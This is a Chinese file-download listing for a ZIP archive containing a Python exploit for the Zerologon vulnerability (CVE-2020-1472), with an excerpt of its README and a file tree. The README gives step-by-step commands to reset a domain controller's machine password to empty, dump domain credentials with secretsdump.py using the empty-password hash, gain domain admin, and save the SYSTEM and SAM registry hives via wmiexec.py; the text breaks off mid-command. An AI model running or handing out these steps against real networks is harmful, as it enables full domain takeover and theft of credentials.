【文件属性】:
文件名称:zerologon:零登录漏洞CVE-2020-1472的利用
文件大小:7KB
文件格式:ZIP
更新时间:2021-03-17 21:48:39
Python
ZeroLogon开发脚本
利用基于和代码。 Secura的原始研究和扫描仪,RiskSense Inc.的修改。
要利用该漏洞,请清除您以前安装的所有Impacket,然后从或更高版本安装Impacket。 然后做:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
如果成功的话,您将能够:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
这应该使您成为域管理员。 完成后,使用来自secretsdump的凭据将wmiexec.py转到目标DC并执行
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SE
【文件预览】:
zerologon-master
----requirements.txt(348B)
----LICENSE(1KB)
----reinstall_original_pw.py(6KB)
----README.md(1KB)
----set_empty_pw.py(6KB)